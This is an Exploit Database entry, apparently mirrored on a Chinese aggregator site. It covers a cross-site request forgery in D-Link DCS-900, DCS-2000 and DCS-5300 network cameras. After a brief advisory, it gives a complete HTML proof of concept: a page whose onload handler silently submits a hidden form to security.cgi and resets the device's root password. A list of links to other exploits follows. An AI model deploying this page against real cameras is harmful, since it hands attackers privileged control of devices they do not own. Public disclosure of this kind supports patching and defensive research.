D-Link DCS – ‘security.cgi’ Cross-Site Request Forgery

Exploit Database
27 阅读

作者： Rigan Iimrigan

日期： 2012-02-23
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/36877/

source: https://www.securityfocus.com/bid/52134/info

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. 

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>

last Exploits
D-Link DCS – ‘security.cgi’ Cross-Site Request Forgery的更多信息

Apache Tomcat Manager – Application Upload (Authenticated) Code Execution (Metasploit)：
Disk Pulse Enterprise 9.9.16 – Remote Buffer Overflow (SEH)：
Astaro Security Gateway 7 – Remote Code Execution：
BigAnt Server 2.97 – SCH / DUPF Buffer Overflow (Metasploit)：
MiniDVBLinux 5.4 – Arbitrary File Read：
Home File Share Server 0.7.2 32 – Directory Traversal：
NUUO NVRMini 2 3.9.1 – ‘sscanf’ Stack Overflow：
KDE 4.4.1 – Ksysguard Remote Code Execution (via Cross Application Scripting)：